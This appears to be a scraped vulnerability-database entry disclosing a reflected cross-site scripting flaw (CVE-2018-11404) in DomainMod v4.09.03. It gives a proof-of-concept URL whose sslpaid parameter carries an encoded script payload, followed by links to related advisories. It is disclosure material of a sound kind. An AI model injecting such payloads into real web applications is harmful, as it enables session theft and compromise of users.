Lucene search
LongerEXPLOITPACK:7ADAB1FC527BAA9D0033F574F15BAB07HistoryMay 28, 2018 - 12:00 a.m.
DomainMod 4.09.03 - sslpaid Cross-Site Scripting
2018-05-2800:00:00
longer
12
0.001 Low
EPSS
Percentile
33.4%
DomainMod 4.09.03 - sslpaid Cross-Site Scripting
# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
# Date: 2018-05-28
# Exploit Author: longerοΌ[email protected]οΌ
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03
# CVE : CVE-2018-11404
An issue was discovered in DomainMod v4.09.03.οΌhttps://github.com/domainmod/domainmod/issues/63οΌ
After the user logged in, open the url:
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3ERelated
cvelist
cvelist
CVE-2018-11404
2018-05-24 07:00:00
cve
cve
CVE-2018-11404
2018-05-24 07:29:00
zdt
zdt
DomainMod 4.09.03 - sslpaid Cross-Site Scripting Vulnerability
2018-05-29 00:00:00
prion
prion
Design/Logic Flaw
2018-05-24 07:29:00
osv
osv
CVE-2018-11404
2018-05-24 07:29:00
nvd
nvd
CVE-2018-11404
2018-05-24 07:29:00
exploitdb
exploitdb
DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting
2018-05-28 00:00:00
openvas
openvas
DomainMOD <= 4.09.03 Multiple Vulnerabilities
2019-01-23 00:00:00
packetstorm
packetstorm
DomainMod 4.09.03 Cross Site Scripting
2018-05-28 00:00:00